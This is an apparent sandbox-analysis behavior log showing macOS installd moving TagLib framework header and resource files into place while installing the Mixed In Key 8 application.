Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/PrivateHeaders/.BC.T_Xhev1o -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/PrivateHeaders/tagutils.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/PrivateHeaders/.BC.T_G9QCqh -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/PrivateHeaders/tzlib.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Resources/.BC.T_DS34Hl -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Resources/Info.plist	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_7hKlYX -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/apefile.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_zSSGb6 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/id3v2footer.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_9eRc4P -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/flacpicture.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_eXsXNa -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/attachedpictureframe.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_l1zvMt -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/flacmetadatablock.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_PpUx4J -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/mp4file.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_16xsaC -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/unknownframe.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_QMUCR8 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/wavpackproperties.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_NxXFYl -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/id3v1tag.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_J0aPtb -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/modproperties.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_sFyz2w -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/apeproperties.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_AwIRfN -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tfile.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_rBPejr -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tbytevector.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_vjdKpd -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/wavpackfile.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_HFKsDm -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/unsynchronizedlyricsframe.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_HZxkvd -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/mp4item.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_XBuy39 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/id3v2extendedheader.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_8rMc2Z -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/asfpicture.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_wCObC3 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/aiffproperties.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_QtlZvC -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/modfileprivate.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_t0oLZV -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/generalencapsulatedobjectframe.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_MxU78s -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tstring.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_usKj2n -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/apeitem.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_UYcWd4 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/id3v2header.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_LP1OeN -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tagunion.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_L6bBdc -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tableofcontentsframe.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_bhweV1 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/id3v2frame.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_6LWHWt -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/id3v2framefactory.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_HQ6nxO -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tag.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_IABGhg -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/audioproperties.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_pbG59Q -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/oggflacfile.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_zJqDpl -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tbytevectorlist.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_aezekX -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/podcastframe.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_G0VsJj -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/oggfile.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_QXU1Sg -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/flacunknownmetadatablock.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_pNEyuA -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/xingheader.h	Jump to behavior
